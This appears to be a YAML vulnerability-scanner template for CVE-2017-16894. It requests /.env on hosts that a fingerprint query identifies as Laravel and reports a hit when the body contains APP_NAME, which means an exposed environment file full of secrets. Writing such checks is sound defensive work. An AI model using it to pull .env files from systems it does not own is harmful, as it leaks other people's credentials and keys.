name: Laravel .env configuration file leaks CVE-2017-16894
manual: true
query: app="Laravel-Framework"
transport: http
rules:
  r0:
    request:
      method: GET
      path: /.env
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"APP_NAME")
expression: r0()
detail:
  links:
  - https://nvd.nist.gov/vuln/detail/CVE-2017-16894
  - https://laravel.com/docs/master/configuration#environment-configuration
  - ""
  description: Laravel framework is a PHP based web application development framework
    developed by Taylor otwell software developer.
  tags: infoleak
